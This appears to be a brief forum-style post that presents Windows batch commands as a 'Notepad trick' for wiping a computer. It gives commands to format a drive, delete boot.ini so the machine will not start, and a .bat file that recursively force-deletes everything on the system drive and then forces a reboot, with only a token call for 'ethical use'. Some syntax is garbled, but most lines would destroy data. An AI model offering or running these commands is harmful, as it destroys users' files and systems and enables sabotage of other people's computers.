Formating HDD with Notepad is as simple as PLAYING a mp3 song..
you just have to do is copy the below code and save it with anyname.EXE
format a:\ /Q/X
-->> this will format your drive a:\
del /F/S/Q c:\boot.ini
-->> this will cause your computer not to boot.
try to figure out urself rest, its working, still if u cant figure it out try this.....
go to notepad and type
@Echo off
Del C:\ *.*y
save it as anyname.bat
OR WORST
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file.MAKE ETHICAL USE OF IT